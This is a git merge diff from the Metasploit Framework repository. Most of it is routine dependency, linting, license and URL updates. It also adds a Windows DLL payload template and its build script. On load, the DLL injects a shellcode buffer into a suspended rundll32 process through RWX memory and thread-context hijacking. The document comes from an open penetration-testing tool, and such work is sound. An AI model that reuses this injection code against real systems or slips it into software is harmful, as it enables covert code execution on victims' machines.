Merge branch 'upstream-master' into feature/cisco-smi-scanner
commit
2969da3d70
|
@ -90,7 +90,7 @@ data/java
|
|||
|
||||
# Avoid checking in Meterpreter libs that are built from
|
||||
# private source. If you're interested in this functionality,
|
||||
# check out Metasploit Pro: http://metasploit.com/download
|
||||
# check out Metasploit Pro: https://metasploit.com/download
|
||||
data/meterpreter/ext_server_pivot.*.dll
|
||||
|
||||
# Avoid checking in metakitty, the source for
|
||||
|
|
|
@ -78,7 +78,7 @@ data/java
|
|||
|
||||
# Avoid checking in Meterpreter libs that are built from
|
||||
# private source. If you're interested in this functionality,
|
||||
# check out Metasploit Pro: http://metasploit.com/download
|
||||
# check out Metasploit Pro: https://metasploit.com/download
|
||||
data/meterpreter/ext_server_pivot.*.dll
|
||||
|
||||
# Avoid checking in metakitty, the source for
|
||||
|
|
41
.rubocop.yml
41
.rubocop.yml
|
@ -8,18 +8,57 @@
|
|||
|
||||
# inherit_from: .rubocop_todo.yml
|
||||
|
||||
AllCops:
|
||||
TargetRubyVersion: 2.2
|
||||
|
||||
Metrics/ClassLength:
|
||||
Description: 'Most Metasploit modules are quite large. This is ok.'
|
||||
Enabled: true
|
||||
Exclude:
|
||||
- 'modules/**/*'
|
||||
|
||||
Metrics/AbcSize:
|
||||
Enabled: false
|
||||
Description: 'This is often a red-herring'
|
||||
|
||||
Metrics/CyclomaticComplexity:
|
||||
Enabled: false
|
||||
Description: 'This is often a red-herring'
|
||||
|
||||
Metrics/PerceivedComplexity:
|
||||
Enabled: false
|
||||
Description: 'This is often a red-herring'
|
||||
|
||||
Style/FrozenStringLiteralComment:
|
||||
Enabled: false
|
||||
Description: 'We cannot support this yet without a lot of things breaking'
|
||||
|
||||
Style/RedundantReturn:
|
||||
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
|
||||
Enabled: false
|
||||
|
||||
Style/Documentation:
|
||||
Enabled: true
|
||||
Description: 'Most Metasploit modules do not have class documentation.'
|
||||
Exclude:
|
||||
- 'modules/**/*'
|
||||
|
||||
Layout/IndentHeredoc:
|
||||
Enabled: false
|
||||
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
|
||||
|
||||
Style/GuardClause:
|
||||
Enabled: false
|
||||
Description: 'This often introduces bugs in tested code'
|
||||
|
||||
Style/NegatedIf:
|
||||
Enabled: false
|
||||
Description: 'This often introduces bugs in tested code'
|
||||
|
||||
Style/ConditionalAssignment:
|
||||
Enabled: false
|
||||
Description: 'This is confusing for folks coming from other languages'
|
||||
|
||||
Style/Encoding:
|
||||
Enabled: true
|
||||
Description: 'We prefer binary to UTF-8.'
|
||||
|
@ -53,7 +92,7 @@ Style/NumericLiterals:
|
|||
Enabled: false
|
||||
Description: 'This often hurts readability for exploit-ish code.'
|
||||
|
||||
Style/SpaceInsideBrackets:
|
||||
Layout/SpaceInsideBrackets:
|
||||
Enabled: false
|
||||
Description: 'Until module template are final, most modules will fail this.'
|
||||
|
||||
|
|
|
@ -16,8 +16,6 @@ rvm:
|
|||
- '2.4.1'
|
||||
|
||||
env:
|
||||
# TODO: restore these tests when the code passes them!
|
||||
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
|
||||
|
||||
|
|
|
@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
|
|||
[YARD]:http://yardoc.org
|
||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
|
||||
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||
|
|
12
Gemfile
12
Gemfile
|
@ -18,9 +18,9 @@ group :development do
|
|||
gem 'pry'
|
||||
# module documentation
|
||||
gem 'octokit'
|
||||
# metasploit-aggregator as a framework only option for now
|
||||
# Metasploit::Aggregator external session proxy
|
||||
gem 'metasploit-aggregator'
|
||||
# Disabled for now for crypttlv updates
|
||||
# gem 'metasploit-aggregator'
|
||||
end
|
||||
|
||||
group :development, :test do
|
||||
|
@ -37,14 +37,6 @@ group :development, :test do
|
|||
end
|
||||
|
||||
group :test do
|
||||
# cucumber extension for testing command line applications, like msfconsole
|
||||
gem 'aruba'
|
||||
# cucumber + automatic database cleaning with database_cleaner
|
||||
gem 'cucumber-rails', :require => false
|
||||
gem 'shoulda-matchers'
|
||||
# Manipulate Time.now in specs
|
||||
gem 'timecop'
|
||||
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
|
||||
# XXX remove when capybara is updated to work with xpath 2.1
|
||||
gem 'xpath', '2.0'
|
||||
end
|
||||
|
|
125
Gemfile.lock
125
Gemfile.lock
|
@ -1,12 +1,13 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.15.0)
|
||||
metasploit-framework (4.16.0)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
backports
|
||||
bcrypt
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
dnsruby
|
||||
filesize
|
||||
|
@ -16,9 +17,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.2.37)
|
||||
metasploit-payloads (= 1.3.1)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.1.10)
|
||||
metasploit_payloads-mettle (= 0.2.0)
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ssh
|
||||
|
@ -35,6 +36,8 @@ PATH
|
|||
pg (= 0.20.0)
|
||||
railties
|
||||
rb-readline
|
||||
rbnacl (< 5.0.0)
|
||||
rbnacl-libsodium
|
||||
recog
|
||||
redcarpet
|
||||
rex-arch
|
||||
|
@ -46,7 +49,7 @@ PATH
|
|||
rex-mime
|
||||
rex-nop
|
||||
rex-ole
|
||||
rex-powershell
|
||||
rex-powershell (< 0.1.73)
|
||||
rex-random_identifier
|
||||
rex-registry
|
||||
rex-rop_builder
|
||||
|
@ -102,48 +105,15 @@ GEM
|
|||
arel (6.0.4)
|
||||
arel-helpers (2.4.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
aruba (0.14.2)
|
||||
childprocess (~> 0.5.6)
|
||||
contracts (~> 0.9)
|
||||
cucumber (>= 1.3.19)
|
||||
ffi (~> 1.9.10)
|
||||
rspec-expectations (>= 2.99)
|
||||
thor (~> 0.19)
|
||||
backports (3.8.0)
|
||||
bcrypt (3.1.11)
|
||||
bcrypt_pbkdf (1.0.0)
|
||||
bindata (2.4.0)
|
||||
bit-struct (0.16)
|
||||
builder (3.2.3)
|
||||
capybara (2.14.4)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
rack (>= 1.0.0)
|
||||
rack-test (>= 0.5.4)
|
||||
xpath (~> 2.0)
|
||||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.1)
|
||||
contracts (0.16.0)
|
||||
cucumber (2.4.0)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.5.0)
|
||||
cucumber-wire (~> 0.0.1)
|
||||
diff-lcs (>= 1.1.3)
|
||||
gherkin (~> 4.0)
|
||||
multi_json (>= 1.7.5, < 2.0)
|
||||
multi_test (>= 0.1.2)
|
||||
cucumber-core (1.5.0)
|
||||
gherkin (~> 4.0)
|
||||
cucumber-rails (1.5.0)
|
||||
capybara (>= 1.1.2, < 3)
|
||||
cucumber (>= 1.3.8, < 4)
|
||||
mime-types (>= 1.17, < 4)
|
||||
nokogiri (~> 1.5)
|
||||
railties (>= 4, < 5.2)
|
||||
cucumber-wire (0.0.1)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.60.1)
|
||||
dnsruby (1.60.2)
|
||||
docile (1.1.5)
|
||||
erubis (2.7.0)
|
||||
factory_girl (4.8.0)
|
||||
|
@ -151,46 +121,24 @@ GEM
|
|||
factory_girl_rails (4.8.0)
|
||||
factory_girl (~> 4.8.0)
|
||||
railties (>= 3.0.0)
|
||||
faraday (0.12.1)
|
||||
faraday (0.13.1)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.9.18)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.5)
|
||||
gherkin (4.1.3)
|
||||
google-protobuf (3.3.0)
|
||||
googleauth (0.5.1)
|
||||
faraday (~> 0.9)
|
||||
jwt (~> 1.4)
|
||||
logging (~> 2.0)
|
||||
memoist (~> 0.12)
|
||||
multi_json (~> 1.11)
|
||||
os (~> 0.9)
|
||||
signet (~> 0.7)
|
||||
grpc (1.4.1)
|
||||
google-protobuf (~> 3.1)
|
||||
googleauth (~> 0.5.1)
|
||||
hashery (2.1.2)
|
||||
i18n (0.8.6)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.1.0)
|
||||
jwt (1.5.6)
|
||||
little-plugger (1.1.4)
|
||||
logging (2.2.2)
|
||||
little-plugger (~> 1.1)
|
||||
multi_json (~> 1.10)
|
||||
loofah (2.0.3)
|
||||
nokogiri (>= 1.5.9)
|
||||
memoist (0.16.0)
|
||||
metasm (1.0.3)
|
||||
metasploit-aggregator (0.2.1)
|
||||
grpc
|
||||
rex-arch
|
||||
metasploit-concern (2.0.5)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (2.0.10)
|
||||
metasploit-credential (2.0.12)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models
|
||||
|
@ -203,7 +151,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.2.37)
|
||||
metasploit-payloads (1.3.1)
|
||||
metasploit_data_models (2.0.15)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -214,28 +162,22 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.1.10)
|
||||
metasploit_payloads-mettle (0.2.0)
|
||||
method_source (0.8.2)
|
||||
mime-types (3.1)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0521)
|
||||
mini_portile2 (2.2.0)
|
||||
minitest (5.10.2)
|
||||
minitest (5.10.3)
|
||||
msgpack (1.1.0)
|
||||
multi_json (1.12.1)
|
||||
multi_test (0.1.2)
|
||||
multipart-post (2.0.0)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (4.1.0)
|
||||
network_interface (0.0.1)
|
||||
nexpose (6.1.0)
|
||||
nexpose (6.1.1)
|
||||
nokogiri (1.8.0)
|
||||
mini_portile2 (~> 2.2.0)
|
||||
octokit (4.7.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
os (0.9.6)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
patch_finder (1.0.2)
|
||||
|
@ -274,11 +216,15 @@ GEM
|
|||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.0.0)
|
||||
rb-readline (0.5.4)
|
||||
rb-readline (0.5.5)
|
||||
rbnacl (4.0.2)
|
||||
ffi
|
||||
rbnacl-libsodium (1.0.13)
|
||||
rbnacl (>= 3.0.1)
|
||||
recog (2.1.11)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.9)
|
||||
rex-arch (0.1.11)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.4)
|
||||
metasm
|
||||
|
@ -286,7 +232,7 @@ GEM
|
|||
rex-core
|
||||
rex-struct2
|
||||
rex-text
|
||||
rex-core (0.1.11)
|
||||
rex-core (0.1.12)
|
||||
rex-encoder (0.1.4)
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -316,7 +262,8 @@ GEM
|
|||
rex-text
|
||||
rex-socket (0.1.8)
|
||||
rex-core
|
||||
rex-sslscan (0.1.4)
|
||||
rex-sslscan (0.1.5)
|
||||
rex-core
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.2)
|
||||
|
@ -337,7 +284,7 @@ GEM
|
|||
rspec-mocks (3.6.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-rails (3.6.0)
|
||||
rspec-rails (3.6.1)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
|
@ -358,22 +305,15 @@ GEM
|
|||
sawyer (0.8.1)
|
||||
addressable (>= 2.3.5, < 2.6)
|
||||
faraday (~> 0.8, < 1.0)
|
||||
shoulda-matchers (3.1.1)
|
||||
activesupport (>= 4.0.0)
|
||||
signet (0.7.3)
|
||||
addressable (~> 2.3)
|
||||
faraday (~> 0.9)
|
||||
jwt (~> 1.5)
|
||||
multi_json (~> 1.10)
|
||||
simplecov (0.14.1)
|
||||
simplecov (0.15.0)
|
||||
docile (~> 1.1.0)
|
||||
json (>= 1.8, < 3)
|
||||
simplecov-html (~> 0.10.0)
|
||||
simplecov-html (0.10.1)
|
||||
simplecov-html (0.10.2)
|
||||
slop (3.6.0)
|
||||
sqlite3 (1.3.13)
|
||||
sshkey (1.9.0)
|
||||
thor (0.19.4)
|
||||
thor (0.20.0)
|
||||
thread_safe (0.3.6)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.5.1)
|
||||
|
@ -386,19 +326,14 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.9.9)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
aruba
|
||||
cucumber-rails
|
||||
factory_girl_rails
|
||||
fivemat
|
||||
metasploit-aggregator
|
||||
metasploit-framework!
|
||||
octokit
|
||||
pry
|
||||
|
@ -406,11 +341,9 @@ DEPENDENCIES
|
|||
redcarpet
|
||||
rspec-rails
|
||||
rspec-rerun
|
||||
shoulda-matchers
|
||||
simplecov
|
||||
timecop
|
||||
xpath (= 2.0)
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.15.1
|
||||
1.15.4
|
||||
|
|
79
LICENSE_GEMS
79
LICENSE_GEMS
|
@ -1,71 +1,62 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
actionpack, 4.2.8, MIT
|
||||
actionview, 4.2.8, MIT
|
||||
activemodel, 4.2.8, MIT
|
||||
activerecord, 4.2.8, MIT
|
||||
activesupport, 4.2.8, MIT
|
||||
Ascii85, 1.0.2, MIT
|
||||
actionpack, 4.2.9, MIT
|
||||
actionview, 4.2.9, MIT
|
||||
activemodel, 4.2.9, MIT
|
||||
activerecord, 4.2.9, MIT
|
||||
activesupport, 4.2.9, MIT
|
||||
addressable, 2.5.1, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
arel, 6.0.4, MIT
|
||||
arel-helpers, 2.4.0, unknown
|
||||
aruba, 0.14.2, MIT
|
||||
backports, 3.8.0, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
bindata, 2.4.0, ruby
|
||||
bit-struct, 0.16, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.15.0, MIT
|
||||
capybara, 2.14.0, MIT
|
||||
childprocess, 0.5.9, MIT
|
||||
bundler, 1.15.1, MIT
|
||||
coderay, 1.1.1, MIT
|
||||
contracts, 0.16.0, "Simplified BSD"
|
||||
cucumber, 2.4.0, MIT
|
||||
cucumber-core, 1.5.0, MIT
|
||||
cucumber-rails, 1.5.0, MIT
|
||||
cucumber-wire, 0.0.1, MIT
|
||||
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||
dnsruby, 1.60.1, "Apache 2.0"
|
||||
docile, 1.1.5, MIT
|
||||
erubis, 2.7.0, MIT
|
||||
factory_girl, 4.8.0, MIT
|
||||
factory_girl_rails, 4.8.0, MIT
|
||||
faraday, 0.12.1, MIT
|
||||
ffi, 1.9.18, "New BSD"
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.3, MIT
|
||||
gherkin, 4.1.3, MIT
|
||||
fivemat, 1.3.5, MIT
|
||||
google-protobuf, 3.3.0, "New BSD"
|
||||
googleauth, 0.5.1, "Apache 2.0"
|
||||
grpc, 1.3.4, "New BSD"
|
||||
i18n, 0.8.1, MIT
|
||||
grpc, 1.4.1, "New BSD"
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
i18n, 0.8.6, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.1.0, ruby
|
||||
jwt, 1.5.6, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.0.3, MIT
|
||||
memoist, 0.15.0, MIT
|
||||
memoist, 0.16.0, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 0.2.1, "New BSD"
|
||||
metasploit-concern, 2.0.4, "New BSD"
|
||||
metasploit-credential, 2.0.9, "New BSD"
|
||||
metasploit-framework, 4.14.23, "New BSD"
|
||||
metasploit-concern, 2.0.5, "New BSD"
|
||||
metasploit-credential, 2.0.10, "New BSD"
|
||||
metasploit-framework, 4.15.0, "New BSD"
|
||||
metasploit-model, 2.0.4, "New BSD"
|
||||
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.14, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.15, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.8.2, MIT
|
||||
mime-types, 3.1, MIT
|
||||
mime-types-data, 3.2016.0521, MIT
|
||||
mini_portile2, 2.1.0, MIT
|
||||
mini_portile2, 2.2.0, MIT
|
||||
minitest, 5.10.2, MIT
|
||||
msgpack, 1.1.0, "Apache 2.0"
|
||||
multi_json, 1.12.1, MIT
|
||||
multi_test, 0.1.2, MIT
|
||||
multipart-post, 2.0.0, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ssh, 4.1.0, MIT
|
||||
network_interface, 0.0.1, MIT
|
||||
nexpose, 6.0.0, BSD
|
||||
nokogiri, 1.7.2, MIT
|
||||
nexpose, 6.1.0, BSD
|
||||
nokogiri, 1.8.0, MIT
|
||||
octokit, 4.7.0, MIT
|
||||
openssl-ccm, 1.2.1, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
|
@ -73,6 +64,7 @@ os, 0.9.6, MIT
|
|||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pdf-reader, 2.0.0, MIT
|
||||
pg, 0.20.0, "New BSD"
|
||||
pg_array_parser, 0.0.9, unknown
|
||||
postgres_ext, 3.0.0, MIT
|
||||
|
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
|
|||
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||
rails-dom-testing, 1.0.8, MIT
|
||||
rails-html-sanitizer, 1.0.3, MIT
|
||||
railties, 4.2.8, MIT
|
||||
railties, 4.2.9, MIT
|
||||
rake, 12.0.0, MIT
|
||||
rb-readline, 0.5.4, BSD
|
||||
recog, 2.1.8, unknown
|
||||
recog, 2.1.11, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.3, "New BSD"
|
||||
rex-core, 0.1.10, "New BSD"
|
||||
rex-arch, 0.1.9, "New BSD"
|
||||
rex-bin_tools, 0.1.4, "New BSD"
|
||||
rex-core, 0.1.11, "New BSD"
|
||||
rex-encoder, 0.1.4, "New BSD"
|
||||
rex-exploitation, 0.1.14, "New BSD"
|
||||
rex-java, 0.1.5, "New BSD"
|
||||
|
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
|
|||
rex-random_identifier, 0.1.2, "New BSD"
|
||||
rex-registry, 0.1.3, "New BSD"
|
||||
rex-rop_builder, 0.1.3, "New BSD"
|
||||
rex-socket, 0.1.6, "New BSD"
|
||||
rex-socket, 0.1.8, "New BSD"
|
||||
rex-sslscan, 0.1.4, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.15, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
robots, 0.10.1, MIT
|
||||
rspec, 3.6.0, MIT
|
||||
rspec-core, 3.6.0, MIT
|
||||
rspec-expectations, 3.6.0, MIT
|
||||
rspec-mocks, 3.6.0, MIT
|
||||
rspec-rails, 3.6.0, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.6.0, MIT
|
||||
ruby_smb, 0.0.17, "New BSD"
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 0.0.18, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
shoulda-matchers, 3.1.1, MIT
|
||||
signet, 0.7.3, "Apache 2.0"
|
||||
simplecov, 0.14.1, MIT
|
||||
simplecov-html, 0.10.1, MIT
|
||||
|
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
|
|||
sshkey, 1.9.0, MIT
|
||||
thor, 0.19.4, MIT
|
||||
thread_safe, 0.3.6, "Apache 2.0"
|
||||
timecop, 0.8.1, MIT
|
||||
timecop, 0.9.1, MIT
|
||||
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 1.2.3, MIT
|
||||
tzinfo-data, 1.2017.2, MIT
|
||||
windows_error, 0.1.2, BSD
|
||||
xdr, 2.0.0, "Apache 2.0"
|
||||
xmlrpc, 0.3.0, ruby
|
||||
xpath, 2.1.0, MIT
|
||||
yard, 0.9.9, MIT
|
||||
|
|
|
@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
|
|||
API documentation for writing modules can be found at:
|
||||
https://rapid7.github.io/metasploit-framework/api
|
||||
|
||||
Questions and suggestions can be sent to:
|
||||
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
|
||||
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
|
||||
|
||||
Installing
|
||||
--
|
||||
|
||||
Generally, you should use [the free installer](https://www.metasploit.com/download),
|
||||
Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
|
||||
which contains all of the dependencies and will get you up and running with a
|
||||
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
|
||||
you'd like to deal with dependencies on your own.
|
||||
|
|
|
@ -0,0 +1,16 @@
|
|||
#!/bin/sh
|
||||
rm -f *.o *.dll
|
||||
|
||||
CCx86="i686-w64-mingw32"
|
||||
CCx64="x86_64-w64-mingw32"
|
||||
|
||||
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
|
||||
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
|
||||
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
|
||||
rm -f temp.dll *.o
|
||||
|
||||
${CCx86}-gcc -c -Os template.c -Wall -shared
|
||||
${CCx86}-dllwrap --def template.def *.o -o temp.dll
|
||||
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
|
||||
rm -f temp.dll *.o
|
||||
|
|
@ -0,0 +1,95 @@
|
|||
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
|
||||
// - removed ExitThread(0) to prevent an Explorer crash
|
||||
// - added Mutex to prevent invoking payload multiple times (at least try)
|
||||
#include <windows.h>
|
||||
#include "template.h"
|
||||
|
||||
void inline_bzero(void *p, size_t l)
|
||||
{
|
||||
BYTE *q = (BYTE *)p;
|
||||
size_t x = 0;
|
||||
for (x = 0; x < l; x++)
|
||||
*(q++) = 0x00;
|
||||
}
|
||||
|
||||
void ExecutePayload(void);
|
||||
|
||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
|
||||
{
|
||||
switch (dwReason)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
ExecutePayload();
|
||||
break;
|
||||
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
|
||||
case DLL_THREAD_ATTACH:
|
||||
break;
|
||||
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
void ExecutePayload(void)
|
||||
{
|
||||
PROCESS_INFORMATION pi;
|
||||
STARTUPINFO si;
|
||||
CONTEXT ctx;
|
||||
LPVOID ep;
|
||||
HANDLE hMutex;
|
||||
SECURITY_ATTRIBUTES MutexAttributes;
|
||||
|
||||
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
|
||||
MutexAttributes.nLength = sizeof(MutexAttributes);
|
||||
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
|
||||
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
|
||||
if(hMutex == NULL)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
if(GetLastError() == ERROR_ALREADY_EXISTS)
|
||||
{
|
||||
CloseHandle(hMutex);
|
||||
return;
|
||||
}
|
||||
|
||||
if(GetLastError() == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
CloseHandle(hMutex);
|
||||
return;
|
||||
}
|
||||
|
||||
// Start up the payload in a new process
|
||||
inline_bzero(&si, sizeof(si));
|
||||
si.cb = sizeof(si);
|
||||
|
||||
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
|
||||
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
|
||||
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
|
||||
GetThreadContext(pi.hThread, &ctx);
|
||||
|
||||
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
|
||||
|
||||
#ifdef _WIN64
|
||||
ctx.Rip = (DWORD64)ep;
|
||||
#else
|
||||
ctx.Eip = (DWORD)ep;
|
||||
#endif
|
||||
|
||||
SetThreadContext(pi.hThread, &ctx);
|
||||
ResumeThread(pi.hThread);
|
||||
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(pi.hProcess);
|
||||
}
|
||||
|
||||
CloseHandle(hMutex);
|
||||
}
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
EXPORTS
|
||||
DllMain@12
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
#define SCSIZE 2048
|
||||
unsigned char code[SCSIZE] = "PAYLOAD:";
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
|
||||
LANGUAGE 9, 1
|
||||
|
||||
|
||||
VS_VERSION_INFO VERSIONINFO
|
||||
FILEVERSION 0,0,0,1
|
||||
PRODUCTVERSION 0,0,0,1
|
||||
FILEFLAGSMASK 0x17L
|
||||
FILEFLAGS 0x0L
|
||||
FILEOS 0x4L
|
||||
FILETYPE 0x2L
|
||||
FILESUBTYPE 0x0L
|
||||
BEGIN
|
||||
|
||||
END
|
||||
|
||||
#define RT_HTML 23
|
||||
|
Binary file not shown.
Binary file not shown.
|
@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
|
|||
return "NTLMv1"
|
||||
end
|
||||
else
|
||||
raise RuntimeError, "Unknow hash type"
|
||||
raise RuntimeError, "Unknown hash type"
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -15,5 +15,5 @@
|
|||
| %bld[ OK ]%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| http://metasploit.com |
|
||||
| https://metasploit.com |
|
||||
|______________________________________________________________________________|%clr
|
||||
|
|
|
@ -18,4 +18,4 @@
|
|||
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
|
||||
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
|
||||
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
|
||||
%clr%bld http://metasploit.com
|
||||
%clr%bld https://metasploit.com
|
||||
|
|
|
@ -27,4 +27,4 @@
|
|||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
http://metasploit.com%clr
|
||||
https://metasploit.com%clr
|
||||
|
|
|
@ -27,4 +27,4 @@
|
|||
# # ### # # ##
|
||||
########################
|
||||
## ## ## ##
|
||||
http://metasploit.com%clr
|
||||
https://metasploit.com%clr
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
